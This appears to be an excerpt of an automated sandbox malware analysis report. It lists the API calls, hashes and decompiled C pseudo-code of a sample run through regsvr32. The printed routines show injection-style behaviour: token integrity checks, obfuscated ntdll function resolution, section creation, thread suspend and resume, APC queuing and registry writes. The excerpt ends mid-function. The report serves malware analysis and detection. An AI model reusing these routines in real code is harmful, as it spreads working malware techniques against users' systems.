                • Instruction Fuzzy Hash: 1B319271504716ABD321CF15DC45B2BBBE8FF88B58F110A99F9896B240E734F904CBA6
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                APIs
                  • Part of subcall function 04BCF607: memset.NTDLL ref: 04BCF611
                • OpenEventA.KERNEL32(00000002,00000000,04BEE374,?,00000000,00000000,?,04BDE99E,?,?,?,?,?,?,?,04BC8D64), ref: 04BD0F81
                • SetEvent.KERNEL32(00000000,?,04BDE99E,?,?,?,?,?,?,?,04BC8D64,?,?,?,?,?), ref: 04BD0F8E
                • Sleep.KERNEL32(00000BB8,?,04BDE99E,?,?,?,?,?,?,?,04BC8D64,?,?,?,?,?), ref: 04BD0F99
                • ResetEvent.KERNEL32(00000000,?,04BDE99E,?,?,?,?,?,?,?,04BC8D64,?,?,?,?,?), ref: 04BD0FA0
                • CloseHandle.KERNEL32(00000000,?,04BDE99E,?,?,?,?,?,?,?,04BC8D64,?,?,?,?,?), ref: 04BD0FA7
                • GetShellWindow.USER32 ref: 04BD0FB2
                • GetWindowThreadProcessId.USER32(00000000), ref: 04BD0FB9
                  • Part of subcall function 04BDBB9E: RegCloseKey.ADVAPI32(04BDE99E), ref: 04BDBC21
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Event$CloseWindow$HandleOpenProcessResetShellSleepThreadmemset
                • String ID:
                • API String ID: 53838381-0
                • Opcode ID: f764e18f7e64d6e2d5d63b03b57bf204b5f731b79091f673522df00ef1c35796
                • Instruction ID: 406f7d614bd62b9770810599da3c0d79158023c17369d0896b2ed4a2c219082d
                • Opcode Fuzzy Hash: f764e18f7e64d6e2d5d63b03b57bf204b5f731b79091f673522df00ef1c35796
                • Instruction Fuzzy Hash: 94214132200510ABD2117B67DC88E2B7B6DEBC9754F10C18AF50A9B141EB39FC01DB72
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E031F5B49(long* _a4) {
                				long _v8;
                				void* _v12;
                				void _v16;
                				long _v20;
                				int _t33;
                				void* _t46;
                
                				_v16 = 1;
                				_v20 = 0x2000;
                				if( *0x31fa2b4 > 5) {
                					_v16 = 0;
                					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
                						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
                						_v8 = 0;
                						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
                						if(_v8 != 0) {
                							_t46 = E031F2114(_v8);
                							if(_t46 != 0) {
                								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
                								if(_t33 != 0) {
                									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
                								}
                								E031F2C11(_t46);
                							}
                						}
                						CloseHandle(_v12);
                					}
                				}
                				 *_a4 = _v20;
                				return _v16;
                			}

                APIs
                • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 031F5B7B
                • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 031F5B9B
                • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 031F5BAB
                • CloseHandle.KERNEL32(00000000), ref: 031F5BFB
                  • Part of subcall function 031F2114: RtlAllocateHeap.NTDLL(00000000,00000000,031F6F72), ref: 031F2120
                • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 031F5BCE
                • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 031F5BD6
                • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 031F5BE6
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                • String ID:
                • API String ID: 1295030180-0
                • Opcode ID: 3f910840d94175231f94ade1e914a92b6136dae852614303d752a3142b323a5c
                • Instruction ID: f4bcc6b6ea36c0f4d6e1d92536403c703c29857adaf50daf0b51941657e94b61
                • Opcode Fuzzy Hash: 3f910840d94175231f94ade1e914a92b6136dae852614303d752a3142b323a5c
                • Instruction Fuzzy Hash: 91213975900209FFEB00EF94DC84EEEBBBDEF09304F1440A5EA11A6250C7759A55EF60
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 64%
                			E031F52C4(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                				intOrPtr _v8;
                				intOrPtr _t9;
                				intOrPtr _t13;
                				char* _t19;
                				char* _t28;
                				void* _t33;
                				void* _t34;
                				char* _t36;
                				void* _t38;
                				intOrPtr* _t39;
                				char* _t40;
                				char* _t42;
                				char* _t43;
                
                				_t34 = __edx;
                				_push(__ecx);
                				_t9 =  *0x31fa2d8; // 0x240d5a8
                				_t1 = _t9 + 0x31fb62c; // 0x253d7325
                				_t36 = 0;
                				_t28 = E031F3CE5(__ecx, _t1);
                				if(_t28 != 0) {
                					_t39 = __imp__;
                					_t13 =  *_t39(_t28, _t38);
                					_v8 = _t13;
                					_t40 = E031F2114(_v8 +  *_t39(_a4) + 1);
                					if(_t40 != 0) {
                						strcpy(_t40, _t28);
                						_pop(_t33);
                						__imp__(_t40, _a4);
                						_t19 = E031F1628(_t33, _t34, _t40, _a8); // executed
                						_t36 = _t19;
                						E031F2C11(_t40);
                						_t42 = E031F73CA(StrTrimA(_t36, "="), _t36);
                						if(_t42 != 0) {
                							E031F2C11(_t36);
                							_t36 = _t42;
                						}
                						_t43 = E031F2A4E(_t36, _t33);
                						if(_t43 != 0) {
                							E031F2C11(_t36);
                							_t36 = _t43;
                						}
                					}
                					E031F2C11(_t28);
                				}
                				return _t36;
                			}

                APIs
                  • Part of subcall function 031F3CE5: lstrlen.KERNEL32(00000000,00000000,00000000,7691C740,?,?,?,031F52DD,253D7325,00000000,7691C740,?,?,031F7675,?,056095B0), ref: 031F3D4C
                  • Part of subcall function 031F3CE5: sprintf.NTDLL ref: 031F3D6D
                • lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,7691C740,?,?,031F7675,?,056095B0), ref: 031F52EF
                • lstrlen.KERNEL32(?,?,?,031F7675,?,056095B0), ref: 031F52F7
                  • Part of subcall function 031F2114: RtlAllocateHeap.NTDLL(00000000,00000000,031F6F72), ref: 031F2120
                • strcpy.NTDLL ref: 031F530E
                • lstrcat.KERNEL32(00000000,?), ref: 031F5319
                  • Part of subcall function 031F1628: lstrlen.KERNEL32(?,?,?,00000000,?,031F5328,00000000,?,?,?,031F7675,?,056095B0), ref: 031F1639
                  • Part of subcall function 031F2C11: RtlFreeHeap.NTDLL(00000000,00000000,031F7013,00000000,?,?,00000000), ref: 031F2C1D
                • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,031F7675,?,056095B0), ref: 031F5336
                  • Part of subcall function 031F73CA: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,031F5342,00000000,?,?,031F7675,?,056095B0), ref: 031F73D4
                  • Part of subcall function 031F73CA: _snprintf.NTDLL ref: 031F7432
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                • String ID: =
                • API String ID: 2864389247-1428090586
                • Opcode ID: f1cfe8f518ec16c229b285c5935e6c4d9690a984107c02213171ecc80baa1e76
                • Instruction ID: 4a0a6762e1e274a8766306e910c0ceabe135340074639e4c87f49e6aecabb587
                • Opcode Fuzzy Hash: f1cfe8f518ec16c229b285c5935e6c4d9690a984107c02213171ecc80baa1e76
                • Instruction Fuzzy Hash: 3811A37B5016257F8B12FB689C84C6E369D9E8DA607194415FB04EB101DFB9C94257B0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • memset.NTDLL ref: 04BD4B88
                  • Part of subcall function 04BCAEC5: GetModuleHandleA.KERNEL32(?,?,?,?,?,04BC1DC6,00000000), ref: 04BCAEE6
                  • Part of subcall function 04BCAEC5: GetProcAddress.KERNEL32(00000000,?), ref: 04BCAEFF
                  • Part of subcall function 04BCAEC5: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,04BC1DC6,00000000), ref: 04BCAF1C
                  • Part of subcall function 04BCAEC5: IsWow64Process.KERNEL32(?,?,?,?,?,?,04BC1DC6,00000000), ref: 04BCAF2D
                  • Part of subcall function 04BCAEC5: CloseHandle.KERNEL32(?,?,?,?,04BC1DC6,00000000), ref: 04BCAF40
                • ResumeThread.KERNEL32(00000004,?,00000000,00000000,00000004,?,00000000,00000000,74E04EE0,00000000), ref: 04BD4C42
                • WaitForSingleObject.KERNEL32(00000064), ref: 04BD4C50
                • SuspendThread.KERNEL32(00000004), ref: 04BD4C63
                  • Part of subcall function 04BCA7FE: memset.NTDLL ref: 04BCAABF
                • ResumeThread.KERNELBASE(00000004), ref: 04BD4CE6
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Thread$HandleProcessResumememset$AddressCloseModuleObjectOpenProcSingleSuspendWaitWow64
                • String ID:
                • API String ID: 223543837-0
                • Opcode ID: 80069918977b2885a5585570871b25414702490526d7a1386f938f1a63481a66
                • Instruction ID: a792bb9530c6015d7c4149a71c6cd6e991f6de334465040901a02706a0d5bccb
                • Opcode Fuzzy Hash: 80069918977b2885a5585570871b25414702490526d7a1386f938f1a63481a66
                • Instruction Fuzzy Hash: 8D418F71900249EFEF21AF65CC84AAE7BB9FF44304F0845EAE91997150E735EE50CB20
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 031F63FF: IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,056089D4,031F2D5F,?,?,?,?,?,?,?,?,?,?,?,031F2D5F), ref: 031F64CB
                  • Part of subcall function 031F3318: IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 031F3355
                  • Part of subcall function 031F3318: IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 031F3386
                • SysAllocString.OLEAUT32(00000000), ref: 031F2D8B
                • SysAllocString.OLEAUT32(0070006F), ref: 031F2D9F
                • SysAllocString.OLEAUT32(00000000), ref: 031F2DB1
                • SysFreeString.OLEAUT32(00000000), ref: 031F2E15
                • SysFreeString.OLEAUT32(00000000), ref: 031F2E24
                • SysFreeString.OLEAUT32(00000000), ref: 031F2E2F
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: String$AllocFreeQueryUnknown_$Interface_Proxy$Service
                • String ID:
                • API String ID: 2831207796-0
                • Opcode ID: 3fc9d38ec5c62d3b2662db9bca600755343f240fec00cf9841ba9e34c7f5cfb0
                • Instruction ID: c6dce3366ed7ed39aa64eddb073cfc1371c0442acb1d82b7ab52bc128babc37b
                • Opcode Fuzzy Hash: 3fc9d38ec5c62d3b2662db9bca600755343f240fec00cf9841ba9e34c7f5cfb0
                • Instruction Fuzzy Hash: A4314036D00609AFDB01EFA8C84469FB7BAEF4D305F144425EE11EB211DB759916CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetLastError.KERNEL32(?,?,?,04BED514,?,04BEA590,00000018,04BCB772,00000000,00000002,04BED518,00000003,04BED514,00000000,016595A8), ref: 04BC6D8F
                • VirtualProtect.KERNELBASE(00000000,00000004,?,?,00000000,00000004,?,00000000,?,?,?,04BED514,?,04BEA590,00000018,04BCB772), ref: 04BC6E1A
                • RtlEnterCriticalSection.NTDLL(04BEE480), ref: 04BC6E42
                • RtlLeaveCriticalSection.NTDLL(04BEE480), ref: 04BC6E60
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: CriticalSection$EnterErrorLastLeaveProtectVirtual
                • String ID:
                • API String ID: 3666628472-0
                • Opcode ID: 825c7d2a5bc4a6695982eb537f99d35ba26377f59bf47d557d87bab2c3c81ba3
                • Instruction ID: c8dfe8196fa8566c2f5cafd089f1b2c155d5660b2d45217eab8924135a917037
                • Opcode Fuzzy Hash: 825c7d2a5bc4a6695982eb537f99d35ba26377f59bf47d557d87bab2c3c81ba3
                • Instruction Fuzzy Hash: 92413E71A00616EFDB11DF65C8849AEBBF5FF88300B10859AE915EB250D774FA41CFA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 04BC8F9E: RtlAllocateHeap.NTDLL(00000000,?,04BC2180), ref: 04BC8FAA
                • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,?,04BCA90D,?,?,?,00000000,00000000), ref: 04BC87F2
                • GetProcAddress.KERNEL32(00000000,?), ref: 04BC8814
                • GetProcAddress.KERNEL32(00000000,?), ref: 04BC882A
                • GetProcAddress.KERNEL32(00000000,?), ref: 04BC8840
                • GetProcAddress.KERNEL32(00000000,?), ref: 04BC8856
                • GetProcAddress.KERNEL32(00000000,?), ref: 04BC886C
                  • Part of subcall function 04BDBEBC: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74E04EE0,00000000,00000000), ref: 04BDBF19
                  • Part of subcall function 04BDBEBC: memset.NTDLL ref: 04BDBF3D
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
                • String ID:
                • API String ID: 3012371009-0
                • Opcode ID: 8b71b0f4ad97298564d2bef56d3da9fca1d4ab12b37f212ff6e67d54b2fa15a1
                • Instruction ID: a32219ad70bdbba06b7e8f36689b982ce9f3fca33e9e69bccb1a4f337f2ab47e
                • Opcode Fuzzy Hash: 8b71b0f4ad97298564d2bef56d3da9fca1d4ab12b37f212ff6e67d54b2fa15a1
                • Instruction Fuzzy Hash: 352132B1A0120BDFD710EF69CD84E5677ECEB44385B0585AAE519CB601E738F9058F71
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E031F21FA(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                				intOrPtr _v8;
                				intOrPtr _t23;
                				intOrPtr _t26;
                				_Unknown_base(*)()* _t28;
                				intOrPtr _t30;
                				_Unknown_base(*)()* _t32;
                				intOrPtr _t33;
                				_Unknown_base(*)()* _t35;
                				intOrPtr _t36;
                				_Unknown_base(*)()* _t38;
                				intOrPtr _t39;
                				_Unknown_base(*)()* _t41;
                				intOrPtr _t44;
                				struct HINSTANCE__* _t48;
                				intOrPtr _t54;
                
                				_t54 = E031F2114(0x20);
                				if(_t54 == 0) {
                					_v8 = 8;
                				} else {
                					_t23 =  *0x31fa2d8; // 0x240d5a8
                					_t1 = _t23 + 0x31fb11a; // 0x4c44544e
                					_t48 = GetModuleHandleA(_t1);
                					_t26 =  *0x31fa2d8; // 0x240d5a8
                					_t2 = _t26 + 0x31fb782; // 0x7243775a
                					_v8 = 0x7f;
                					_t28 = GetProcAddress(_t48, _t2);
                					 *(_t54 + 0xc) = _t28;
                					if(_t28 == 0) {
                						L8:
                						E031F2C11(_t54);
                					} else {
                						_t30 =  *0x31fa2d8; // 0x240d5a8
                						_t5 = _t30 + 0x31fb76f; // 0x614d775a
                						_t32 = GetProcAddress(_t48, _t5);
                						 *(_t54 + 0x10) = _t32;
                						if(_t32 == 0) {
                							goto L8;
                						} else {
                							_t33 =  *0x31fa2d8; // 0x240d5a8
                							_t7 = _t33 + 0x31fb4ce; // 0x6e55775a
                							_t35 = GetProcAddress(_t48, _t7);
                							 *(_t54 + 0x14) = _t35;
                							if(_t35 == 0) {
                								goto L8;
                							} else {
                								_t36 =  *0x31fa2d8; // 0x240d5a8
                								_t9 = _t36 + 0x31fb406; // 0x4e6c7452
                								_t38 = GetProcAddress(_t48, _t9);
                								 *(_t54 + 0x18) = _t38;
                								if(_t38 == 0) {
                									goto L8;
                								} else {
                									_t39 =  *0x31fa2d8; // 0x240d5a8
                									_t11 = _t39 + 0x31fb792; // 0x6c43775a
                									_t41 = GetProcAddress(_t48, _t11);
                									 *(_t54 + 0x1c) = _t41;
                									if(_t41 == 0) {
                										goto L8;
                									} else {
                										 *((intOrPtr*)(_t54 + 4)) = _a4;
                										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                										_t44 = E031F2F8D(_t54, _a8); // executed
                										_v8 = _t44;
                										if(_t44 != 0) {
                											goto L8;
                										} else {
                											 *_a12 = _t54;
                										}
                									}
                								}
                							}
                						}
                					}
                				}
                				return _v8;
                			}

                APIs
                  • Part of subcall function 031F2114: RtlAllocateHeap.NTDLL(00000000,00000000,031F6F72), ref: 031F2120
                • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,031F122E,?,?,?,?,00000000,00000000), ref: 031F221F
                • GetProcAddress.KERNEL32(00000000,7243775A), ref: 031F2241
                • GetProcAddress.KERNEL32(00000000,614D775A), ref: 031F2257
                • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 031F226D
                • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 031F2283
                • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 031F2299
                  • Part of subcall function 031F2F8D: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74E04EE0,00000000,00000000,031F22B9), ref: 031F2FEA
                  • Part of subcall function 031F2F8D: memset.NTDLL ref: 031F300C
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
                • String ID:
                • API String ID: 3012371009-0
                • Opcode ID: 524adef5e0231c666bf45c7c6a80c9a19c2568c1c3fd2bd024fa517769f6eb5e
                • Instruction ID: ed0dcbd9b466c61212b83cc2521882dca27b5df4d1afd9a2433ed914ee57f8a1
                • Opcode Fuzzy Hash: 524adef5e0231c666bf45c7c6a80c9a19c2568c1c3fd2bd024fa517769f6eb5e
                • Instruction Fuzzy Hash: B4219FB560060AAFD754EFA8C844E5A7BFCFF0C654B048A25EA09C7211E334E946CF70
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateThread.KERNELBASE(00000000,00000000,00000000,?,00000000,04BD2BEA), ref: 04BD9DDD
                • QueueUserAPC.KERNELBASE(?,00000000,?), ref: 04BD9DF2
                • GetLastError.KERNEL32(00000000), ref: 04BD9DFD
                • TerminateThread.KERNEL32(00000000,00000000), ref: 04BD9E07
                • CloseHandle.KERNEL32(00000000), ref: 04BD9E0E
                • SetLastError.KERNEL32(00000000), ref: 04BD9E17
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                • String ID:
                • API String ID: 3832013932-0
                • Opcode ID: 42231f8793748a2c491b29f1ade2efbc42a9a719e452128ef615af3091308050
                • Instruction ID: fc6716010b9db6f7992f040ff40f3fd5e36cee448f7be687fbabdb5641fb525c
                • Opcode Fuzzy Hash: 42231f8793748a2c491b29f1ade2efbc42a9a719e452128ef615af3091308050
                • Instruction Fuzzy Hash: 5AF01232105A21EBD7212FA2AD08F5BBB69FF8C751F04480EF6059B151D73A9D209BB6
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 88%
                			E031F1B78(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
                				signed int _v8;
                				char _v12;
                				signed int* _v16;
                				char _v284;
                				void* __esi;
                				char* _t59;
                				intOrPtr* _t60;
                				void* _t62;
                				intOrPtr _t64;
                				char _t65;
                				void* _t67;
                				intOrPtr _t68;
                				intOrPtr _t69;
                				intOrPtr _t71;
                				void* _t73;
                				signed int _t81;
                				void* _t91;
                				void* _t92;
                				char _t98;
                				signed int* _t100;
                				intOrPtr* _t101;
                				void* _t102;
                
                				_t92 = __ecx;
                				_v8 = _v8 & 0x00000000;
                				_t98 = _a16;
                				if(_t98 == 0) {
                					__imp__( &_v284,  *0x31fa39c);
                					_t91 = 0x80000002;
                					L6:
                					_t59 = E031F23CC( &_v284,  &_v284);
                					_a8 = _t59;
                					if(_t59 == 0) {
                						_v8 = 8;
                						L29:
                						_t60 = _a20;
                						if(_t60 != 0) {
                							 *_t60 =  *_t60 + 1;
                						}
                						return _v8;
                					}
                					_t101 = _a24;
                					_t62 = E031F77FE(_t92, _t97, _t101, _t91, _t59); // executed
                					if(_t62 != 0) {
                						L27:
                						E031F2C11(_a8);
                						goto L29;
                					}
                					_t64 =  *0x31fa2d0; // 0x5609b30
                					_t16 = _t64 + 0xc; // 0x5609bfe
                					_t65 = E031F23CC(_t64,  *_t16);
                					_a24 = _t65;
                					if(_t65 == 0) {
                						L14:
                						_t29 = _t101 + 0x14; // 0x102
                						_t33 = _t101 + 0x10; // 0x3d031f90, executed
                						_t67 = E031F5173(_t97,  *_t33, _t91, _a8,  *0x31fa394,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))); // executed
                						if(_t67 == 0) {
                							_t68 =  *0x31fa2d8; // 0x240d5a8
                							if(_t98 == 0) {
                								_t35 = _t68 + 0x31fba48; // 0x4d4c4b48
                								_t69 = _t35;
                							} else {
                								_t34 = _t68 + 0x31fba43; // 0x55434b48
                								_t69 = _t34;
                							}
                							if(E031F3964(_t69,  *0x31fa394,  *0x31fa398,  &_a24,  &_a16) == 0) {
                								if(_t98 == 0) {
                									_t71 =  *0x31fa2d8; // 0x240d5a8
                									_t44 = _t71 + 0x31fb83e; // 0x74666f53
                									_t73 = E031F23CC(_t44, _t44);
                									_t99 = _t73;
                									if(_t73 == 0) {
                										_v8 = 8;
                									} else {
                										_t47 = _t101 + 0x10; // 0x3d031f90
                										E031F2BC9( *_t47, _t91, _a8,  *0x31fa398, _a24);
                										_t49 = _t101 + 0x10; // 0x3d031f90
                										E031F2BC9( *_t49, _t91, _t99,  *0x31fa390, _a16);
                										E031F2C11(_t99);
                									}
                								} else {
                									_t40 = _t101 + 0x10; // 0x3d031f90, executed
                									E031F2BC9( *_t40, _t91, _a8,  *0x31fa398, _a24); // executed
                									_t43 = _t101 + 0x10; // 0x3d031f90
                									E031F2BC9( *_t43, _t91, _a8,  *0x31fa390, _a16);
                								}
                								if( *_t101 != 0) {
                									E031F2C11(_a24);
                								} else {
                									 *_t101 = _a16;
                								}
                							}
                						}
                						goto L27;
                					}
                					_t21 = _t101 + 0x10; // 0x3d031f90, executed
                					_t81 = E031F55E9( *_t21, _t91, _a8, _t65,  &_v16,  &_v12); // executed
                					if(_t81 == 0) {
                						_t100 = _v16;
                						if(_v12 == 0x28) {
                							 *_t100 =  *_t100 & _t81;
                							_t26 = _t101 + 0x10; // 0x3d031f90
                							E031F5173(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
                						}
                						E031F2C11(_t100);
                						_t98 = _a16;
                					}
                					E031F2C11(_a24);
                					goto L14;
                				}
                				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                					goto L29;
                				} else {
                					_t97 = _a8;
                					E031F7A9C(_t98, _a8,  &_v284);
                					__imp__(_t102 + _t98 - 0x117,  *0x31fa39c);
                					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
                					_t91 = 0x80000003;
                					goto L6;
                				}
                			}

                APIs
                • StrChrA.SHLWAPI(031F61AC,0000005F,00000000,00000000,00000104), ref: 031F1BAB
                • lstrcpy.KERNEL32(?,?), ref: 031F1BD8
                  • Part of subcall function 031F23CC: lstrlen.KERNEL32(?,00000000,05609B30,00000000,031F3413,05609D0E,69B25F44,?,?,?,?,69B25F44,00000005,031FA010,4D283A53,?), ref: 031F23D3
                  • Part of subcall function 031F23CC: mbstowcs.NTDLL ref: 031F23FC
                  • Part of subcall function 031F23CC: memset.NTDLL ref: 031F240E
                  • Part of subcall function 031F2BC9: lstrlenW.KERNEL32(?,?,?,031F1D41,3D031F90,80000002,031F61AC,031F19CD,74666F53,4D4C4B48,031F19CD,?,3D031F90,80000002,031F61AC,?), ref: 031F2BEE
                  • Part of subcall function 031F2C11: RtlFreeHeap.NTDLL(00000000,00000000,031F7013,00000000,?,?,00000000), ref: 031F2C1D
                • lstrcpy.KERNEL32(?,00000000), ref: 031F1BFA
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                • String ID: ($\
                • API String ID: 3924217599-1512714803
                • Opcode ID: ce14d8e0eeac8cacb2dc04adaad9609a9924848e502d14fb007de83a89f2339d
                • Instruction ID: 143b119e97f1fd008263b9ef734c498bee7563fd047616544d88e63bcf5871ec
                • Opcode Fuzzy Hash: ce14d8e0eeac8cacb2dc04adaad9609a9924848e502d14fb007de83a89f2339d
                • Instruction Fuzzy Hash: 9D51297A10060AFFDB16EF60DC44EAA7BBAEF0C310F148924FA1996160D735D9659F60
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 66%
                			E031F7253(intOrPtr* __eax, void* __ecx, void* __edx, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
                				void* _v8;
                				char _v48;
                				void* __edi;
                				intOrPtr _t22;
                				void* _t26;
                				intOrPtr _t30;
                				intOrPtr _t37;
                				intOrPtr* _t43;
                				void* _t44;
                				void* _t48;
                				intOrPtr* _t49;
                				void* _t50;
                				intOrPtr _t51;
                
                				_t48 = __edx;
                				_t44 = __ecx;
                				_t43 = _a16;
                				_t49 = __eax;
                				_t22 =  *0x31fa2d8; // 0x240d5a8
                				_t2 = _t22 + 0x31fb682; // 0x657a6973
                				wsprintfA( &_v48, _t2,  *__eax,  *_t43);
                				_t51 =  *0x31fa3a0; // 0x5609b20
                				_push(0x800);
                				_push(0);
                				_push( *0x31fa290);
                				if( *0x31fa2a4 >= 5) {
                					_t26 = RtlAllocateHeap(); // executed
                					if(_t26 == 0) {
                						L6:
                						_a4 = 8;
                						L7:
                						if(_a4 != 0) {
                							L10:
                							 *0x31fa2a4 =  *0x31fa2a4 + 1;
